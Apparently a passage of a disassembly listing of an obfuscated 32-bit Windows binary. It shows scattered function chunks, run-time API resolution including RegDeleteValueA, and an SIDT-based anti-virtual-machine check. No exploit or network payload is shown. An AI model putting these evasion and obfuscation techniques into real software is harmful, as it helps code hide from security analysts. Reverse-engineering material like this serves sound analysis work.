loc_9AE288: ; CODE XREF: sub_9B4480+A3�j
and esi, esi
jnz sub_9AD1A4
jmp off_9BA840
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AE298: ; CODE XREF: sub_9B649C-2343�j
; DATA XREF: .text:off_9B96A3�o
add eax, ecx
mov [ebp+var_1C], eax
loc_9AE29D: ; CODE XREF: sub_9B649C-7A93�j
and bl, bl
jns loc_9B512A
jmp off_9B9D04
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AE2AC: ; CODE XREF: sub_9B3864-6484�j
; sub_9B3864-366A�j
mov [ebp+var_2058], ecx
xor eax, eax
mov [ebp+var_206C], eax
mov [ebp+var_2050], ecx
mov [ebp+var_205C], eax
loc_9AE2C6: ; CODE XREF: sub_9B3864-2463�j
cmp edi, 11h
jnz loc_9AEB8C
jmp off_9B9342
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AE2D8: ; CODE XREF: sub_9B1D80+FFC�j
; DATA XREF: .text:off_9B925C�o
mov eax, [ebp-2044h]
test byte ptr [eax+8], 8
jz loc_9AB0A2
jmp off_9B9399
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AE2F0: ; CODE XREF: sub_9B63D8-60BC�j
cmp ebx, 10h
jl loc_9AC5CD
jmp off_9BA158
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9AE300: ; CODE XREF: sub_9ABA3C+5C�j
push esi
pop eax
lea edx, [eax+1]
loc_9AE305: ; CODE XREF: sub_9ABA3C+28CE�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_9AE305
jmp off_9BA716
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 4
push esi
sub esi, esi
loc_9AE317: ; CODE XREF: .text:009AE321�j
push esi
call sub_9ABE84
inc esi
cmp esi, 40h
jl short loc_9AE317
jmp loc_9AED80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9AE328: ; CODE XREF: sub_9B3EFC-1BB0�j
mov edx, eax
and edx, 0FEFFh
cmp edx, 12C6h
jz loc_9AD6E0
jmp off_9BAF57
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE344: ; CODE XREF: sub_9B1A08-31F6�j
test al, 40h
jz loc_9B2C5C
jmp loc_9B5444
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE35C: ; CODE XREF: sub_9B0930-2472�j
push off_9B965A
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx+0Ch]
pop edx
mov [edx+20h], eax
mov eax, dword_9BCB74
push dword ptr [eax+0Ch]
pop eax
push dword ptr [eax+20h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B9F7A
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE390: ; CODE XREF: sub_9B0930+24B5�j
push off_9B8D85
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+0Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
push dword ptr [eax+0Ch]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9BAF67
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1584
loc_9AE3C4: ; CODE XREF: sub_9B1584-274B�j
; DATA XREF: .text:off_9B982B�o
mov [ebp+var_1C], 1
jmp loc_9AD087
; END OF FUNCTION CHUNK FOR sub_9B1584
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ADCEC
loc_9AE3D3: ; CODE XREF: sub_9ADCEC-2456�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push off_9B94D7
call dword ptr [eax+1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ADCEC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE400 proc near ; CODE XREF: sub_9ADAC4+77D�p
; sub_9B2E04+73�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 009AE1B8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AF8E8 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 009B43AB SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B4944 SIZE 0000000C BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BA0E0
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor eax, eax
mov [ebp+var_1C], eax
mov [ebp+var_4], eax
call sub_9A5238
test eax, eax
jnz loc_9AF8E8
jmp loc_9B4944
sub_9AE400 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9AE444: ; CODE XREF: sub_9B3FF8-3D36�j
; DATA XREF: .text:off_9B94F4�o
lea edx, [ebx-4]
mov [ebp+var_20], edx
push esi
pop ecx
call sub_9ABADC
cmp eax, [esi+ebx-4]
jnz loc_9B2884
jmp loc_9AB26C
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9AE460: ; CODE XREF: sub_9B04A8-3499�j
; sub_9B04A8+3E95�j
test bl, 4
jz loc_9B27CA
jmp loc_9ABF94
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AE473: ; CODE XREF: sub_9ADDA4+30D2�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-28h]
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE490: ; CODE XREF: sub_9B0930+13E6�j
push offset aRegdeletevalue ; "RegDeleteValueA"
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop ecx
mov [ecx+1Ch], eax
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
mov ecx, [eax+1Ch]
test ecx, ecx
jz loc_9B23EF
jmp loc_9AE35C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AE4CE: ; CODE XREF: sub_9B03E8-12F5�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9AE4EC: ; CODE XREF: sub_9B4610+4B4�j
call sub_9B227C
sub eax, dword_9BBF94[esi]
cmp eax, 258h
ja loc_9AF228
jmp off_9B911D
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE508: ; CODE XREF: sub_9B0930-2021�j
; DATA XREF: .text:off_9BADCC�o
push off_9B9220
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx]
pop ecx
mov [ecx+80h], eax
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push dword ptr [eax+80h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9BAF5B
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9AE544: ; CODE XREF: sub_9B3984-60B1�j
push 6
lea ecx, [ebp+var_4054]
push ecx
push 2002h
lea edx, [ebp+var_4024]
push edx
call sub_9ABD30
mov [ebp+var_4050], eax
cmp eax, 4
jnz loc_9AB89C
jmp loc_9ABE1C
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE574: ; CODE XREF: sub_9B0930-26D0�j
mov edx, [eax+14h]
test edx, edx
jz loc_9B23EF
jmp loc_9B40C8
; ---------------------------------------------------------------------------
loc_9AE584: ; CODE XREF: sub_9B0930+34ED�j
push 1Ch
push 40h
call edi
mov dword_9BCB74, eax
test eax, eax
jz loc_9B23EF
jmp off_9BA8EF
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE5A0: ; CODE XREF: sub_9B0930+4CF4�j
; DATA XREF: .text:off_9B8EDA�o
mov edx, [eax+4]
test edx, edx
jz loc_9B23EF
jmp off_9B9550
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9AE5B7: ; CODE XREF: sub_9AEC20-34FA�j
; sub_9AEC20-1ED6�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
mov edx, [ecx]
push off_9BADC8
call dword ptr [edx+1Ch]
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AE5F0: ; CODE XREF: sub_9B649C-5775�j
; sub_9B649C-136F�j
or bh, bh
jns loc_9B319A
jmp loc_9B3194
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AE600: ; CODE XREF: sub_9ACEE8+86�j
; DATA XREF: .text:off_9B9F4C�o
call sub_9B2010
and eax, eax
jz loc_9ACF55
jmp off_9BABAC
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9AE614: ; CODE XREF: sub_9B3408+88�j
xor ebx, ebx
mov [ebp-128h], ebx
push dword_9BCB74
pop eax
push dword ptr [eax+0Ch]
pop ecx
lea edx, [ebp-128h]
push edx
push ebx
push ebx
push ebx
mov edi, [ebp-138h]
push edi
push dword ptr [ebp-124h]
pop eax
push eax
call dword ptr [ecx+10h]
test eax, eax
jnz loc_9AB749
jmp off_9BA6FF
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
loc_9AE654: ; CODE XREF: .text:009B2AC8�j
push ecx
sidt fword ptr [esp-2]
pop dword ptr [esp+4]
push dword ptr [esp+4]
pop eax
cmp eax, 0D0000000h
ja loc_9B2AB4
jmp off_9BAA05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9AE674: ; CODE XREF: sub_9B3FF8+3E�j
; DATA XREF: .text:off_9B9793�o
cmp edi, 2000h
ja loc_9B2884
jmp loc_9ABCEC
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9AE688: ; CODE XREF: sub_9B2F1C-739F�j
lea ecx, [esi+eax]
call sub_9ADCEC
push edi
pop eax
mov [ebp-1Ch], eax
loc_9AE695: ; CODE XREF: sub_9B2F1C-C0A�j
push eax
mov ecx, esi
call sub_9B2830
mov edx, [ebp+0Ch]
mov [edx], eax
jmp loc_9B528F
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AE6A8: ; CODE XREF: sub_9ADAC4+588D�j
mov eax, dword_9BCB74
push dword ptr [eax+10h]
pop ecx
push edi
call dword ptr [ecx+38h]
loc_9AE6B5: ; CODE XREF: sub_9ADAC4+1F66�j
; sub_9ADAC4+4762�j ...
sub edi, edi
loc_9AE6B7: ; CODE XREF: sub_9ADAC4-2B20�j
mov [ebp-40h], edi
cmp edi, 0Ah
jge loc_9AF35C
jmp off_9BADA4
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2010
loc_9AE6CC: ; CODE XREF: sub_9B2010-198F�j
; sub_9B2010+38�j
push dword_9BCB74
pop edx
mov eax, [edx]
call dword ptr [eax+30h]
mov dword_9BEBF8, eax
mov ecx, dword_9BCB74
mov edx, [ecx+8]
push 0
lea eax, [ebp+var_1C]
push eax
call dword ptr [edx+4]
mov [ebp+var_20], eax
mov ecx, dword_9BCB74
mov edx, [ecx]
push eax
push off_9B9F95
call dword ptr [edx+34h]
loc_9AE704: ; CODE XREF: sub_9B2010-1995�j
push dword_9BEBF4
pop eax
or eax, eax
jnz loc_9B012F
jmp off_9B8956
; END OF FUNCTION CHUNK FOR sub_9B2010
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AE71C: ; CODE XREF: sub_9ADDA4+35FD�j
; DATA XREF: .text:off_9B9040�o
mov eax, [ebp+esi*4-27Ch]
cdq
mov ebx, eax
xor ebx, edx
push dword ptr [ebp+ecx*4-27Ch]
pop eax
sub ebx, edx
cdq
xor eax, edx
sub eax, edx
cmp eax, ebx
jle loc_9AE8A9
jmp loc_9AE8A4
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AE744: ; CODE XREF: sub_9B1D80+215F�j
; DATA XREF: .text:off_9BACA8�o
xor eax, eax
mov [ebx], eax
mov [ebx+4], eax
mov [ebx+8], eax
mov [ebx+0Ch], eax
jmp loc_9B1D5B
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AE758: ; CODE XREF: sub_9AB1A0+1DE5�j
push esi
pop eax
call sub_9B327C
or eax, eax
jnz loc_9AEA48
jmp loc_9B5B90
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9AE76C: ; CODE XREF: sub_9B562C-32CC�j
; DATA XREF: .text:off_9BAAD0�o
mov eax, [ebp+var_130]
mov cx, [eax]
mov word ptr [ebp+var_128], cx
loc_9AE77C: ; CODE XREF: sub_9B562C-64C4�j
; sub_9B562C-5B2F�j ...
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push esi
call dword ptr [eax+80h]
jmp loc_9AECDF
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9AE794: ; CODE XREF: sub_9B43F4-373�j
; DATA XREF: .text:off_9B9414�o
and al, 4
neg al
mov edi, [ebp+14h]
sbb eax, eax
and eax, 0FFFFFFF5h
add eax, 11h
cmp eax, edi
jnz loc_9ACEAF
jmp loc_9AD544
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AE7B0: ; CODE XREF: sub_9B63D8-B107�j
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
push eax
call dword ptr [edx+38h]
loc_9AE7BE: ; CODE XREF: sub_9B63D8-B10D�j
; sub_9B63D8-6A85�j
mov eax, [ebp-2134h]
or eax, eax
jz loc_9AED1C
jmp off_9B9A8B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9AE7D4: ; CODE XREF: sub_9AFB1C+35�j
; DATA XREF: .text:off_9B9373�o
mov dword ptr [ebp-4], 0
push esi
pop edx
xor ecx, ecx
mov [edx], ecx
mov [edx+4], ecx
mov [edx+8], ecx
mov [edx+0Ch], ecx
mov [edx+10h], ecx
test bl, 8
mov [edx+14h], ecx
mov [edx+18h], ecx
mov [edx+1Ch], ecx
jz loc_9B28FC
jmp loc_9B5DA8
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE804: ; CODE XREF: sub_9B1A08-325�j
; DATA XREF: .text:off_9B9240�o
mov [ebp+var_4200], eax
test al, 1
jz loc_9B5444
jmp loc_9AE344
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AE818: ; CODE XREF: sub_9B63D8-ADAB�j
push off_9B8DB6
pop edi
xor edx, edx
lea esi, [ebx+ebp-2120h]
push 2
pop ecx
repe cmpsd
jnz loc_9B469E
jmp off_9B9840
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AE83C: ; CODE XREF: sub_9B3864-667A�j
and edx, edx
jz loc_9AF480
jmp off_9B94B7
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AE84C: ; CODE XREF: sub_9B1F68-5911�j
xor edi, edi
loc_9AE84E: ; CODE XREF: sub_9B1F68-118A�j
; sub_9B1F68+3994�j
mov [ebp-34h], edi
cmp edi, ebx
jnb loc_9B5AD3
jmp loc_9B436C
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE860 proc near ; CODE XREF: sub_9A5033+75�p
; sub_9AFF64:loc_9ADB20�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 009AC1FC SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009AF738 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B0F18 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B0FBC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B4A90 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B5A10 SIZE 00000016 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B87A8
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
jmp off_9B907E
sub_9AE860 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9AE890: ; CODE XREF: sub_9AEAAC+48�j
; sub_9AEAAC+5857�j
mov [ebp+var_24], ecx
cmp ecx, [ebp+arg_0]
jge loc_9B5EF7
jmp loc_9AED58
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AE8A4: ; CODE XREF: sub_9ADDA4+99B�j
mov esi, ecx
mov [ebp-2Ch], esi
loc_9AE8A9: ; CODE XREF: sub_9ADDA4+995�j
inc ecx
jmp loc_9B1396
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov edi, [ebp-1Ch]
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9AE8BD: ; CODE XREF: sub_9AF030-29F5�j
; sub_9AF030+29A2�j ...
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA623
call dword ptr [ecx+1Ch]
test edi, edi
jz loc_9B3F80
jmp off_9BA84C
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ABADC
loc_9AE8E0: ; CODE XREF: sub_9ABADC-B1D�j
; DATA XREF: .text:off_9B9402�o
pop esi
loc_9AE8E1: ; CODE XREF: sub_9ABADC+6�j
not eax
retn
; END OF FUNCTION CHUNK FOR sub_9ABADC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AE8E4: ; CODE XREF: sub_9B0930+11EA�j
; DATA XREF: .text:off_9B8E38�o
push off_9B8EA0
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+7Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
push dword ptr [eax+7Ch]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9BADCC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AE918: ; CODE XREF: sub_9B1D80+3961�j
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
mov eax, [ebp-203Ah]
push eax
call dword ptr [edx+28h]
push eax
sub eax, eax
push dword ptr [ebp-2038h]
pop edx
push dword ptr [ebp-2040h]
pop esi
call sub_9B1334
mov esi, [ebp+14h]
loc_9AE945: ; CODE XREF: sub_9B1D80-591F�j
; sub_9B1D80-4425�j ...
xor ecx, ecx
cmp ecx, [ebp-2058h]
jmp off_9BAEF9
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE954: ; CODE XREF: sub_9B1A08+3286�j
push [ebp+var_41E0]
pop eax
cmp eax, 0Ah
jnb loc_9AD484
jmp off_9B8D2B
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9AE96C: ; CODE XREF: sub_9B36E8-6A7B�j
or esi, 80000000h
mov [ebp-1Ch], esi
loc_9AE975: ; CODE XREF: sub_9B36E8-6A81�j
mov eax, dword_9BBD30
and eax, eax
jnz loc_9ACE6D
jmp off_9BAECD
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AE988: ; CODE XREF: sub_9B1A08+9B2�j
; DATA XREF: .text:off_9B9F6E�o
cmp eax, 0FFFFFFFFh
jz loc_9B2C62
jmp off_9BAE22
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B5480
loc_9AE9A0: ; CODE XREF: sub_9B5480-49C5�j
mov eax, [eax+44h]
or eax, eax
jz loc_9AD8DD
jmp off_9BAC29
; END OF FUNCTION CHUNK FOR sub_9B5480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2C70
loc_9AE9B4: ; CODE XREF: sub_9B2C70-55E1�j
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
push dword ptr [ebp-4Ch]
pop eax
mov ecx, [eax]
push ecx
jmp loc_9B01D8
; END OF FUNCTION CHUNK FOR sub_9B2C70
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B29B0
loc_9AE9CC: ; CODE XREF: sub_9B29B0-6C6�j
; sub_9B29B0+6C�j
mov dword ptr [ebp-228h], 1
jmp loc_9B541B
; END OF FUNCTION CHUNK FOR sub_9B29B0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AE9DC: ; CODE XREF: sub_9B649C-3B0D�j
; DATA XREF: .text:off_9BA4D5�o
movzx ecx, word ptr [esi+eax]
mov [ebp+var_20], ecx
lea eax, [ecx+eax+2]
mov [ebp+var_1C], eax
loc_9AE9EA: ; CODE XREF: sub_9B649C-7AA3�j
shl edx, 1
jmp loc_9B0D1E
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AE9F4: ; CODE XREF: sub_9B649C-576F�j
; DATA XREF: .text:off_9BA097�o
movzx ecx, bx
test ecx, edx
jz short loc_9AE9EA
jmp loc_9B2984
; ---------------------------------------------------------------------------
loc_9AEA00: ; CODE XREF: sub_9B649C-4C51�j
add eax, 4
mov [ebp+var_1C], eax
loc_9AEA06: ; CODE XREF: sub_9B649C-4C57�j
test bl, 40h
jz loc_9AE29D
jmp loc_9B3140
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AEA14: ; CODE XREF: sub_9ACEE8+2682�j
; DATA XREF: .text:off_9B96E4�o
cmp ecx, 1F4h
jb loc_9ACB00
jmp off_9BA694
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD1A4
loc_9AEA28: ; CODE XREF: sub_9AD1A4+1B�j
; sub_9B4480+285�j
mov ecx, ebx
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_9AEA3A: ; CODE XREF: sub_9AD1A4+15�j
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B25E5
; END OF FUNCTION CHUNK FOR sub_9AD1A4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AEA48: ; CODE XREF: sub_9AB1A0+1DDF�j
; sub_9AB1A0+35C1�j ...
xor esi, esi
mov [ebp-1Ch], esi
loc_9AEA4D: ; CODE XREF: sub_9AB1A0+A9FB�j
test esi, esi
jz loc_9B58CD
jmp off_9B938C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9AEA5C: ; CODE XREF: sub_9B3EFC-8BEC�j
cmp eax, 200C0h
jz loc_9AD6E0
jmp off_9B87BF
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AEA70: ; CODE XREF: sub_9B1D80+163�j
xor edx, edx
loc_9AEA72: ; CODE XREF: sub_9B1D80+1BB4�j
push eax
push ecx
push ebx
movzx eax, word ptr [esi+2]
push eax
push dword ptr [esi+4]
pop ecx
push ecx
push edx
mov edx, [edi+4]
push edx
mov ebx, [ebp-2028h]
xor eax, eax
and ebx, ebx
setnz al
push eax
call sub_9B4FD0
mov [ebp-205Ch], eax
cmp eax, 0FFFFFFFFh
jz loc_9B3EC4
jmp off_9BA82C
; END OF FUNCTION CHUNK FOR sub_9B1D80
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AEAAC proc near ; CODE XREF: sub_9B6264-5AD�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 009ADA70 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009AE890 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AED58 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009B0498 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B42FE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 009B5EF7 SIZE 0000002C BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B96DC
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9BAD92
call dword ptr [ecx+18h]
xor ecx, ecx
mov [ebp+var_4], ecx
